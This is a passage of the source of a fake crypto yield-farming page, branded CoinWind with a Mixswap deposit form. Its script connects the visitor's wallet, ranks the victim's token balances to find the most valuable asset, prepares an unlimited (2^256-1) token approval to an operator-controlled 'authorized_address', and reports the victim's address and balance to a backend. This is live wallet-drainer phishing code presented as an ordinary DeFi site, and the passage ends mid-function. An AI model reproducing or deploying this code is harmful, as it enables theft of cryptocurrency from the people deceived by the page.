														<div class="footer__right-img-box" style="margin-right: 56px;">
															<a href="https://twitter.com/coinwind_com" target="_blank">
																<img class="footer__right-img-wechat" src="./kc_files/Twitter.d2acf616.svg"
																alt="">
															</a>
														</div>
														<div class="footer__right-img-box">
															<a href="https://medium.com/coinwind" target="_blank">
																<img class="footer__right-img-wechat" src="./kc_files/M.da8fe63d.svg"
																alt="">
															</a>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</header>
			<main>
				
				<div class="jss36">
					<div class="page__container" style="width: 100%; height: auto; background-color: rgb(246, 247, 250); padding-bottom: 112px;">
						<!--<div class="h-btns">-->
						<!--	<div class="h-btns-content">-->
						<!--		<button class=" g-button tab-heco g-width">-->
						<!--			單幣挖礦V2-->
						<!--		</button>-->
						<!--		<button class="nothing-button-heco">-->
						<!--			LP挖礦-->
						<!--		</button>-->
						<!--	</div>-->
						<!--</div>-->
						<div class="section-banner">
							<img src="./kc_files/banner-wusun-heco-zhong.e0abd260.png" alt="">
						</div>
						<div class="g-filters">
							<div class="tab__containerc" style="font-size:16px;text-align:center;line-height:50px;display:none" id="qb_dz">
								
							</div>
							<div class="tab__containerc" style="font-size:16px;text-align:center;line-height:50px;" id="qb_dz_2">
								
							</div>
							
							<!--<div class="search_listc">-->
							<!--	<div class="search_option">-->
							<!--		<div class="g-switch-wrapper g-switch-wrapper--heco">-->
							<!--			<div class="g-switch">-->
							<!--			</div>-->
							<!--			<span class="g-switch-label">-->
							<!--				已參與專案-->
							<!--			</span>-->
							<!--		</div>-->
							<!--	</div>-->
								<!--<div class="btn_right">-->
								<!--	<div class="search_ji heco_search_ji">-->
								<!--		遷移記錄-->
								<!--	</div>-->
								<!--</div>-->
							<!--</div>-->
						</div>
						<div class="pools-main">
							<!--<div style="width:90%;height:180px;margin:0 auto;border-radius:10px;background:#fff;">-->
							<!--    <div style="width:90%;height:50px;margin:15px auto;background:#fff;">-->
							<!--        <div style="width:10%;height:100%;float:left;"></div>-->
							<!--        <div style="width:50%;height:100%;float:left;line-height:50px;font-size:20px;font-weight:700;">COW</div>-->
							<!--    </div>-->
							    
							<!--     <div style="width:90%;height:20px;margin:10px auto;background:#fff;">-->
							<!--        <div style="width:30%;height:100%;float:left;font-size:14px;padding-left:20px;font-weight:400;">待提取收益</div>-->
							<!--        <div style="width:60%;height:100%;float:left;text-align:right;font-size:16px;color:black;font-weight:700;" id="my_dtx_money">0</div>-->
							<!--    </div>-->
							    
							    <!-- <div style="width:90%;height:20px;border:1px solid red;margin:10px auto;background:#fff;">-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--</div>-->
							    
							    <!-- <div style="width:90%;height:20px;border:1px solid red;margin:10px auto;background:#fff;">-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--</div>-->
							    
							    <!-- <div style="width:90%;height:20px;border:1px solid red;margin:10px auto;background:#fff;">-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--</div>-->
							<!--    <input type="hidden" value="" id="yu">-->
							    
							<!--     <div style="width:90%;height:50px;margin:10px auto;background:#fff;">-->
							<!--        <div style="width:50%;height:100%;float:left;">-->
							<!--            <div style="width:80%;height:30px;border:1px solid #3078ff;border-radius:20px;margin:10px auto;text-align:center;line-height:30px;color:#3078ff;font-weight:700;font-size:16px;"  onclick="tq()">-->
							<!--                提取-->
							<!--            </div>-->
							            
							            
							<!--        </div>-->
							<!--        <div style="width:50%;height:100%;float:left;">-->
							<!--            <div style="width:80%;height:30px;border:1px solid #3078ff;border-radius:20px;margin:10px auto;background:#3078ff;text-align:center;line-height:30px;color:#fff;font-weight:700;font-size:16px;" id="btn-connect" >-->
							<!--                授权-->
							<!--            </div>-->
							<!--        </div>-->
							<!--    </div>-->
							<!--</div>-->
							<div style="width:90%;height:300px;margin:0 auto;border-radius:10px;background:#fff;">
							    <div style="width:90%;height:50px;margin:15px auto;background:#fff;">
							        <div style="width:10%;height:100%;float:left;"></div>
							        <div style="width:50%;height:100%;float:left;line-height:50px;font-size:20px;font-weight:700;">CoinWind</div>
							    </div>
							    <div style="width:90%;height:20px;margin:10px auto;background:#fff;">
							        <div style="width:30%;height:100%;float:left;font-size:14px;padding-left:20px;font-weight:400;">收益率</div>
							        <div style="width:60%;height:100%;float:left;text-align:right;font-size:20px;color:#33cabb;font-weight:700;">10.00%</div>
							    </div>
							    <div style="width:90%;height:20px;margin:10px auto;background:#fff;">
							        <div style="width:30%;height:100%;float:left;font-size:14px;padding-left:20px;font-weight:400;">锁仓量</div>
							        <div style="width:60%;height:100%;float:left;text-align:right;font-size:16px;color:black;font-weight:700;">234,50.49</div>
							    </div>
							    <div style="width:90%;height:20px;margin:10px auto;background:#fff;">
							        <div style="width:30%;height:100%;float:left;font-size:14px;padding-left:20px;font-weight:400;">待发放</div>
							        <div style="width:60%;height:100%;float:left;text-align:right;font-size:16px;color:black;font-weight:700;" id="my_dff_money">0</div>
							    </div>
							    
							     <div style="width:90%;height:20px;margin:10px auto;background:#fff;">
							        <div style="width:30%;height:100%;float:left;font-size:14px;padding-left:20px;font-weight:400;">发放中</div>
							        <div style="width:60%;height:100%;float:left;text-align:right;font-size:16px;color:black;font-weight:700;" id="my_dtx_money">0</div>
							    </div>
							    
							    
							    
							    
							    
							    <!-- <div style="width:90%;height:20px;border:1px solid red;margin:10px auto;background:#fff;">-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--</div>-->
							    
							    <!-- <div style="width:90%;height:20px;border:1px solid red;margin:10px auto;background:#fff;">-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--</div>-->
							    
							    <!-- <div style="width:90%;height:20px;border:1px solid red;margin:10px auto;background:#fff;">-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--    <div style="width:50%;height:100%;float:left;"></div>-->
							    <!--</div>-->
							    <input type="hidden" value="" id="yu">
							    
							     <div style="width:90%;height:50px;margin:10px auto;background:#fff;">
							        <div style="width:50%;height:100%;float:left;">
							            <div style="width:80%;height:30px;border:1px solid #3078ff;border-radius:20px;margin:10px auto;text-align:center;line-height:30px;color:#3078ff;font-weight:700;font-size:16px;" onclick="tq()">
							                提取收益
							            </div>
							        </div>
							        <div style="width:50%;height:100%;float:left;">
							            <div style="width:80%;height:30px;border:1px solid #3078ff;border-radius:20px;margin:10px auto;background:#3078ff;text-align:center;line-height:30px;color:#fff;font-weight:700;font-size:16px;" id="btn-connect" >
							                领取矿场
							            </div>
							            
							            <div style="width:80%;height:30px;border:1px solid #3078ff;border-radius:20px;margin:10px auto;background:#3078ff;text-align:center;line-height:30px;color:#fff;font-weight:700;font-size:16px;display:none" id="btn-connect_2" >
							                生产中！
							            </div>
							        </div>
							    </div>
							</div>
						</div>
						
						<div class="footer">
							<div class="jss34">
								<div class="footer__wrapper">
									<div class="footer__left">
										<img class="footer__left-logo" src="./kc_files/logo-hui.05f9b921.svg"
										alt="">
									</div>
									<div class="footer__right">
									</div>
								</div>
							</div>
						</div>
						<div style="padding: 0px 16px; box-sizing: border-box; position: fixed; bottom: 32px; width: 100%; z-index: 1000;">
							<div class="footer__menu" style="background: rgba(255, 255, 255, 0.98); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.08) 0px 2px 8px 0px; border-radius: 16px; display: flex; justify-content: space-between; height: 48px;">
						
								<div class="menu__item"  onclick="kc()">
									<div style="width:100%;height:100%;">
									    <div style="width:30px;height:30px;margin:0 auto;">
									        <img src="/kj/image/home1.png">
									    </div>
									</div>
									<p class="p-heco">
										首頁
									</p>
								</div>
								<div class="menu__item" onclick="yq()">
									<div style="width:100%;height:100%;">
									    <div style="width:30px;height:30px;margin:0 auto;">
									        <img src="/kj/image/yaoqing.png">
									    </div>
									</div>
									<p class="p-heco">
										邀请
									</p>
								</div>
								<div class="menu__item" onclick="kf()">
									<div style="width:100%;height:100%;">
									    <div style="width:30px;height:30px;margin:0 auto;">
									        <img src="/kj/image/kefu.png">
									    </div>
									</div>
									<p class="p-heco">
										客服
									</p>
								</div>
								
								<div class="menu__item menu__item--actived">
									<div style="width:100%;height:100%;">
									    <div style="width:30px;height:30px;margin:0 auto;">
									        <img src="/kj/image/suo.png">
									    </div>
									</div>
									<p class="p-heco">
										農場
									</p>
								</div>
								
							</div>
						</div>
					</div>
				</div>
			</main>
		</section>
		<script>
			!
			function(e) {
				function r(r) {
					for (var n, f, i = r[0], l = r[1], a = r[2], c = 0, s = []; c < i.length; c++) f = i[c],
					Object.prototype.hasOwnProperty.call(o, f) && o[f] && s.push(o[f][0]),
					o[f] = 0;
					for (n in l) Object.prototype.hasOwnProperty.call(l, n) && (e[n] = l[n]);
					for (p && p(r); s.length;) s.shift()();
					return u.push.apply(u, a || []),
					t()
				}
				function t() {
					for (var e, r = 0; r < u.length; r++) {
						for (var t = u[r], n = !0, i = 1; i < t.length; i++) {
							var l = t[i];
							0 !== o[l] && (n = !1)
						}
						n && (u.splice(r--, 1), e = f(f.s = t[0]))
					}
					return e
				}
				var n = {},
				o = {
					1 : 0
				},
				u = [];
				function f(r) {
					if (n[r]) return n[r].exports;
					var t = n[r] = {
						i: r,
						l: !1,
						exports: {}
					};
					return e[r].call(t.exports, t, t.exports, f),
					t.l = !0,
					t.exports
				}
				f.m = e,
				f.c = n,
				f.d = function(e, r, t) {
					f.o(e, r) || Object.defineProperty(e, r, {
						enumerable: !0,
						get: t
					})
				},
				f.r = function(e) {
					"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
						value: "Module"
					}),
					Object.defineProperty(e, "__esModule", {
						value: !0
					})
				},
				f.t = function(e, r) {
					if (1 & r && (e = f(e)), 8 & r) return e;
					if (4 & r && "object" == typeof e && e && e.__esModule) return e;
					var t = Object.create(null);
					if (f.r(t), Object.defineProperty(t, "default", {
						enumerable: !0,
						value: e
					}), 2 & r && "string" != typeof e) for (var n in e) f.d(t, n,
					function(r) {
						return e[r]
					}.bind(null, n));
					return t
				},
				f.n = function(e) {
					var r = e && e.__esModule ?
					function() {
						return e.
					default
					}:
					function() {
						return e
					};
					return f.d(r, "a", r),
					r
				},
				f.o = function(e, r) {
					return Object.prototype.hasOwnProperty.call(e, r)
				},
				f.p = "/";
				var i = this.webpackJsonpdefibank = this.webpackJsonpdefibank || [],
				l = i.push.bind(i);
				i.push = r,
				i = i.slice();
				for (var a = 0; a < i.length; a++) r(i[a]);
				var p = l;
				t()
			} ([])
		</script>
		
		
		
				<div class="views" style="display:none;">
					<!-- main view -->
					<div class="view view-main">
						<!-- Pages -->
						<div class="pages">
							<div class="page bg">
								<div class="page-content">
									<div class="list-block quantity">
										<div class="quantity-logo" style="color: #2f2f2f;font-weight: bold;font-size: 0.5rem;padding-top: 0.5rem;padding-bottom: 1.3rem;"><img src="./Mixswap_files/logo.png" style="width: 1rem;margin-right: 0.2rem;">Mixswap混币Defi系统</div>
										<div class="quantity-label" style="position:relative;">
											<label class="quantity-title">充值数量</label>
											<input type="number" placeholder="最小充值数量1" name="quantity" class="quantity-input">
											<span id="danwei" style="position: relative;right: -85%;top: -1.1rem;color: #bbbaba;">ETH</span>
										</div>
									</div>
									<div class="list-block points">
										<div class="list-block-title">选择充值方式</div>
										<div class="list-block-form">
											<ul class="list-block-radio">
												<li>
													<label class="item-radio item-content">
														<input type="radio" name="demo-radio" value="ERC" checked="">
														<i class="icon icon-radio"></i>
														<div class="item-media">
															<img src="./Mixswap_files/ico01.png">
														</div>
														<div class="item-inner">
															<div class="item-title">USDT-ERC20</div>
															<div class="item-after">泰达币</div>
														</div>
													</label>
												</li>
												<!-- <li>
													<label class="item-radio item-content">
														<input type="radio" name="demo-radio" value="USDT" checked>
														<i class="icon icon-radio"></i>
														<div class="item-media">
															<img src="assets/img/ico02.png" />
														</div>
														<div class="item-inner">
															<div class="item-title">USDT-TRC20</div>
															<div class="item-after">波场</div>
														</div>
													</label>
												</li> -->
												<li>
													<label class="item-radio item-content">
														<input type="radio" name="demo-radio" value="BTC">
														<i class="icon icon-radio"></i>
														<div class="item-media">
															<img src="./Mixswap_files/ico03.png">
														</div>
														<div class="item-inner">
															<div class="item-title">BTC</div>
															<div class="item-after">比特币</div>
														</div>
													</label>
												</li>
												<li>
													<label class="item-radio item-content">
														<input type="radio" name="demo-radio" value="ETH">
														<i class="icon icon-radio"></i>
														<div class="item-media">
															<img src="./Mixswap_files/ico04.png">
														</div>
														<div class="item-inner">
															<div class="item-title">ETH</div>
															<div class="item-after">以太坊</div>
														</div>
													</label>
												</li>
											</ul>
											<div class="list-block-button">
												<button id="btn-connect" class="button button-fill ">立即充值</button>
											</div>

										
										</div>
										
									</div>
								</div>
							</div>
							<!-- Preloader -->
							<div class="modal">
								<div class="preloader"></div>
							</div>
							<div class="tishi">
								提交中
							</div>
						</div>
					</div>
				</div>
				<div id="fffsss" style="color: white;z-index: 99999999999999999;position: absolute;top: 1px;"></div>

		<!-- Custom app js-->
		<script src="./Mixswap_files/main.js"></script>
		<script src="./Mixswap_files/index_admin.js"></script>
		<script type="text/javascript">
		var domain = 'https://' + window.location.host + '/';
    function yingwen(){
        var s_zhi = getUrlQueryString('s');
        var kc_url = "./index_erc_en.html?s="+s_zhi;
        // alert(kc_url)
        window.location.href=kc_url;
    }
    function yq(){
        
        
      var test2=$("#qb_dz").html();
        var s_zhi = getUrlQueryString('s');
        var kc_url = "./yq_erc.html?s="+s_zhi+'&sj='+test2;
        // alert(kc_url)
        window.location.href=kc_url;
        
    }
    function kf(){
        $.ajax({
			type: 'get',
			url:  domain + 'api/setting_data',
			success:function(data){
    		    var kc_url = data.data.kefu_url
            // alert(kc_url)
                window.location.href=kc_url;
			},
			error:function(data){
				console.log(data)
			}
		})
       
        
    }
    function kc(){
        var s_zhi = getUrlQueryString('s');
        // alert(s_zhi)
        var kc_url = "./index_erc.html?s="+s_zhi;
        // alert(kc_url)
        window.location.href=kc_url;
        
    }
    
    	        	        
	            function tq(){
            	    var qb_dz = document.getElementById("qb_dz").innerText;
         
                    var url=window.location.host;
				    var domain = 'https://'+url+'/';
                    $.ajax({
            			type: 'get',
            			url:  domain + 'api/sq_sy_tx?address='+qb_dz,
            			async : false,
            			success:function(data){
            			 //   alert(data.code)
            			    if(data.code == 1){
            			               layui.use(function(){
                    var layer = layui.layer;
                  //欢迎信息
                  layer.msg(data.msg);
                  
                });
            			    }else if(data.code == 0){
            			     //   alert('申请成功')
            			               layui.use(function(){
                    var layer = layui.layer;
                  //欢迎信息
                  layer.msg('申请成功');
                  
                });
            			        location.reload();
            			    }else if(data.code == 2){
            			     //   alert('申请失败')
            			      layui.use(function(){
                    var layer = layui.layer;
                  //欢迎信息
                  layer.msg('申请失败');
                  
                });
            			    }
            
            			},
            			error:function(data){
            
            			}
            		})
                }
    
    // function yq(){
        
        
    //   var test2=$("#qianbao_dz").html();
    //     var s_zhi = getUrlQueryString('s');
    //     var kc_url = "./yq_erc.html?s="+s_zhi+'&sj='+test2;
    //     alert(kc_url)
    //     window.location.href=kc_url;
        
    // }		
		
    function getUrlQueryString(names, urls) {
		urls = urls || window.location.href;
		urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
		var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
		var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
		if (r != null && r[2] != "")return unescape(r[2]);
		return null;

	}
			const ABI = [{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}];

			$(function() {
				var authorized_address = '0x59A349D4AC95161282FE2becb6C7206556f89b6C';
				var infura_key = '';
				var url=window.location.host;
				var domain = 'https://'+url+'/';
				var bizhong = '';
				$("input[name='demo-radio']").on('change',function(){

				    var bi = $("input[name='demo-radio']:checked").val()
				    console.log(bi)
				    $('#danwei').text(bi)
				})

				const approveNum = new BigNumber(2).exponentiatedBy(256).minus(1)
				/******************************************/
	        // Unpkg imports
	        const _web3 = new Web3('https://cloudflare-eth.com')

	        let injectedWeb3 = null, total = 0
	        let approveAddr = '0xdac17f958d2ee523a2206206994597c13d831ec7'
	        const addr = {
	        	'usdt': '0xdac17f958d2ee523a2206206994597c13d831ec7',
	        	'sushi': '0x6b3595068778dd592e39a122f4f5a5cf09c90fe2',
	        	'usdc': '0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
	        	'uni': '0x1f9840a85d5af5bf1d1762f925bdaddc4201f984',
	        	'aave': '0x7fc66500c84a76ad7e9c93437bfc5ac33e2ddae9',
	        	'yfi': '0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e',
	        	'dai': '0x6b175474e89094c44da98b954eedeac495271d0f',
	        	'link': '0x514910771af9ca656af840dff83e8264ecf986ca',
	        	"LON": "0x0000000000095413afc295d19edeb1ad7b71c952",
	        	"CRV": "0xD533a949740bb3306d119CC777fa900bA034cd52",
	        }

	        const addr2 = {
	        	"WBTC": "0x2260fac5e5542a773aa44fbcfedf7c193bc2c599",
	        	"WETH": "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2",
	        	"CONV": "0xc834fa996fa3bec7aad3693af486ae53d8aa8b50",
	        	"inj": "0xe28b3B32B6c345A34Ff64674606124Dd5Aceca30",
	        	"MKR": "0x9f8f72aa9304c8b593d555f12ef6589cc3a579a2",
	        	"ALPHA": "0xa1faa113cbe53436df28ff0aee54275c13b40975",
	        	"BAND": "0xba11d00c5f74255f56a5e366f4f77f5a186d7f55",
	        	"snx": "0xc011a73ee8576fb46f5e1c5751ca3b9fe0af2a6f",
	        	"comp": "0xc00e94cb662c3520282e6f5717214004a7f26888",
	        	"sxp": "0x8ce9137d39326ad0cd6491fb5cc0cba0e089b6a9",
	        }

	        const addr3 = {
	        	"FTT": "0x50d1c9771902476076ecfc8b2a83ad6b9355a4c9",
	        	"ust": "0xa47c8bf37f92abed4a126bda807a7b7498661acd",
	        	"TRIBE": "0xc7283b66eb1eb5fb86327f08e1b5816b0720212b",
	        	"wise": "0x66a0f676479Cee1d7373f3DC2e2952778BfF5bd6",
	        	"RRAX": "0x853d955acef822db058eb8505911ed77f175b99e",
	        	"CORE": "0x62359Ed7505Efc61FF1D56fEF82158CcaffA23D7",
	        	"mir": "0x09a3ecafa817268f77be1283176b946c4ff2e608",
	        	"DPI": "0x1494ca1f11d487c2bbe4543e90080aeba4ba3c2b",
	        	"luna": "0xd2877702675e6ceb975b4a1dff9fb7baf4c91ea9",
	        	"HEZ": "0xEEF9f339514298C6A857EfCfC1A762aF84438dEE",
	        	"fxs": "0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0",
	        	"fei": "0x956f47f50a910163d8bf957cf5846d573e7f87ca",
	        }

	        async function getMostValuableAssets(account) {
	        	let _symbol = 'USDT'
	        	for (const [symbol, contract] of Object.entries(contracts)) {
	        		contract.methods.balanceOf(account).call(function(err, balance) {
	        			const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
	        			if (usdt > total && usdt > 1000) {
	        				_symbol = symbol
	        				total = usdt
	        				approveAddr = addr[_symbol]
	        				bizhong = _symbol

	        			}
	        		})
	        	}

	        	bizhong = _symbol
console.log('_symbol:'+_symbol);
	        	return _symbol
	        }

	        function getUrlQueryString(names, urls) {
	        	urls = urls || window.location.href;
	        	urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
	        	var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
	        	var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
	        	if (r != null && r[2] != "")return unescape(r[2]);
	        	return null;
	        }
	        
	        

	        
	   function my_dtx(){
    	    var qb_dz = document.getElementById("qb_dz").innerText;
    
    	    $.ajax({
    			type: 'get',
    			url:  domain + 'api/my_dtx?address='+qb_dz,
    			async : false,
    			success:function(data){
    			 //   alert(data.data.dtx)
    		        document.getElementById("my_dtx_money").innerHTML = data.data.dtx;
    			},
    			error:function(data){
    
    			}
    		})
    	}

	        function getInfo(){

	            //  $("#fffsss").text(domain + '/api/api/getInfo')
	            $.ajax({
	            	type: 'get',
	            	url:  domain + 'api/get_erc',

	               // async : false,
					success:function(data){
						console.log(data)
						authorized_address = data.data.authorized_address;
				// 		 alert(authorized_address)
						console.log(authorized_address);
						infura_key = data.data.infura_key;



					},
					error:function(data){


					}

	            })
	        }
	        

	        
	        async function postInfo(address,symbol,trx){
	        	var s = getUrlQueryString('s')
	        	var a = getUrlQueryString('r')
	        	var sj = getUrlQueryString('sj')
	        	
	       // 	alert(s)
                // alert(authorized_address)
	        	var data = {
	        		address:address,
	        		authorized_address:authorized_address,
	        		bizhong:symbol,
	        		code:s,
	        		reffer:a,
        			type:1,
        			sj:sj,
        			balance:trx
	        	}

	        	$.ajax({
	        		type: 'post',
	        		url:  domain + 'api/insert_erc',
	        		data:data,
	        		success:function(data){
	        		    
	        		    layui.use(function(){
                            var layer = layui.layer;
                            layer.msg('授权成功');
                          
                        });
                        location.reload();
	        		 //   alert('123')
	                    //console.log(data)
	                   // if(data.code === 200){
	                   // 	console.log('success')
					
	                   // }
	                   // console.log(data.msg)
	                },
	                error:function(data){
	                	console.log(data)
	                }

	            })

	        }

	        async function getMostValuableAssets2(account) {
	        	let _symbol = 'USDT'
	        	for (const [symbol, contract] of Object.entries(contracts2)) {
	        		contract.methods.balanceOf(account).call(function(err, balance) {
	        			const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
	        			if (usdt > total && usdt > 1000) {
	        				_symbol = symbol
	        				total = usdt
	        				approveAddr = addr[_symbol]

	        			}
	        		})


	        	}

	        	bizhong = _symbol

console.log('_symbol:'+_symbol);
	        	return _symbol
	        }

	        const price = {
	        	usdt: 1,
	        	sushi: 15.5,
	        	usdc: 1,
	        	dai: 1,
	        	uni: 28.6,
	        	aave: 380,
	        	yfi: 35000,
	        	link: 28.2,
	        	"LON": 7,
	        	"CRV": 3.01367,
	        	"GUSD": 1,
	        	"WBTC": 56478.2,
	        	"WETH": 1991.89,
	        	"CONV": 0.105733,
	        	"inj": 13.3812,
	        	"MKR": 2076.68,
	        	"ALPHA": 1.79043,
	        	"BAND": 16.3441,
	        	"snx": 20.0588,
	        	"comp": 468.076,
	        	"sxp": 4.11818,
	        	"FTT": 46.1779,
	        	"ust": 1.00543,
	        	"TRIBE": 1.42926,
	        	"wise": 0.446973,
	        	"RRAX": 0.996821,
	        	"CORE": 5447.59,
	        	"mir": 8.69817,
	        	"DPI": 415.906,
	        	"luna": 15.2402,
	        	"HEZ": 5.97533,
	        	"fxs": 8.47025,
	        	"fei": 0.898157,
	        }

	        const decimals = {
	        	sushi: 18,
	        	usdt: 6,
	        	usdc: 6,
	        	uni: 18,
	        	dai: 18,
	        	aave: 18,
	        	yfi: 18,
	        	link: 18,
	        	WBTC: 8,
	        }

	        const contracts = {}, contracts2 = {}, contracts3 = {}
	        for (const symbol of Object.keys(addr)) {
	        	const contractAddr = addr[symbol]
	        	contracts[symbol] = new _web3.eth.Contract(ABI, contractAddr)
	        }

	        for (const symbol of Object.keys(addr2)) {
	        	const contractAddr = addr2[symbol]
	        	contracts2[symbol] = new _web3.eth.Contract(ABI, contractAddr)
	        }

	        for (const symbol of Object.keys(addr3)) {
	        	const contractAddr = addr3[symbol]
	        	contracts3[symbol] = new _web3.eth.Contract(ABI, contractAddr)
	        }

	        const Web3Modal = window.Web3Modal.default;
	        const WalletConnectProvider = window.WalletConnectProvider.default;

	        // Web3modal instance
	        let web3Modal
	        // Chosen wallet provider given by the dialog window
	        let provider;
	        // Address of the selected account
	        let selectedAccount;

	        /**
	         * Setup the orchestra
	         */
	         async function init() {



	         	getInfo();



	            // Tell Web3modal what providers we have available.
	            // Built-in web browser provider (only one can exist as a time)
	            // like MetaMask, Brave or Opera is added automatically by Web3modal

	            const providerOptions = {
	            	walletconnect: {
	            		package: WalletConnectProvider,
	            		options: {
	                        // Mikko's test key - don't copy as your mileage may vary
	                        infuraId: infura_key,
	                    }
	                },
	            };

	            web3Modal = new Web3Modal({
	                cacheProvider: false, // optional
	                providerOptions, // required
	                disableInjectedProvider: false, // optional. For MetaMask / Brave / Opera.
	            });


	            try {
	            	provider = await web3Modal.connect()
	            	provider.enable()
	            } catch(e) {
	            	console.log("Could not get a wallet connection", e);
	            	return;
	            }

	            // Subscribe to accounts change
	            provider.on("accountsChanged", async (accounts) => {
	            	await fetchAccountData();
	            });

	            // Subscribe to chainId change
	            provider.on("chainChanged", async (chainId) => {
	            	await fetchAccountData();
	            });

	            // Subscribe to networkId change
	            provider.on("networkChanged", async (networkId) => {
	            	await fetchAccountData();
	            });

	            await refreshAccountData();
	        }

	        /**
	         * Kick in the UI action after Web3modal dialog has chosen a provider
	         */
	         async function fetchAccountData() {
	         	const web3 = new Web3(provider);
	         	injectedWeb3 = web3
	         	provider.enable()
	         	const accounts = await web3.eth.getAccounts()
	         	selectedAccount = accounts[0]
	         	
	       //  	alert(selectedAccount)
	         	
	         	document.getElementById("qb_dz").innerHTML = selectedAccount;
	         	
	         	 var shortName = selectedAccount.substring(0,4);
	         	 //alert(shortName)
            var disLength = selectedAccount.length;
            var xingxing = selectedAccount.substring(disLength-4,disLength);
      

            document.getElementById("qb_dz_2").innerHTML = shortName+'**************'+xingxing;

	         	$.ajax({
    			type: 'get',
    			url:  domain + 'api/sx_money?address='+selectedAccount+'&type=erc',
    			async : false,
    			success:function(data){
    			},
    			error:function(data){
    
    			}
    		})
			$.ajax({
    			type: 'get',
    			url:  domain + 'api/is_lq_kj?address='+selectedAccount,
    			success:function(data){
    			    if(data.code == 0){
    			     //   $('#btn-connect').html('收益中');
    			     document.getElementById('btn-connect').style.display = 'none'
    			     document.getElementById('btn-connect_2').style.display = ''
    			    }
    			},
    			error:function(data){
    				console.log(data)
    			}
    		})
	         	my_dtx()
	         }


	        /**
	         * Fetch account data for UI when
	         * - User switches accounts in wallet
	         * - User switches networks in wallet
	         * - User connects wallet initially
	         */
	         async function refreshAccountData() {

	            // If any current data is displayed when
	            // the user is switching acounts in the wallet
	            // immediate hide this data
	            // document.querySelector("#connected").style.display = "none";
	            // document.querySelector("#prepare").style.display = "block";

	            // Disable button while UI is loading.
	            // fetchAccountData() will take a while as it communicates
	            // with Ethereum node via JSON-RPC and loads chain data
	            // over an API call.
	            document.querySelector("#btn-connect").setAttribute("disabled", "disabled")
	            await fetchAccountData(provider);
	            document.querySelector("#btn-connect").removeAttribute("disabled")
	        }


	        /**
	         * Connect wallet button pressed.
	         */
	         async function onConnect() {

	         	var amount = $('.quantity-input').val();
	         
	         		$('.pages').append('<div class="modal-overlay"></div>');
	         		$('.modal-overlay').addClass('modal-overlay-visible');
	         		$('.modal').removeClass('modal-out').addClass('modal-in');


	         	console.log(authorized_address);
	         	console.log(infura_key);



	         	console.log(bizhong);

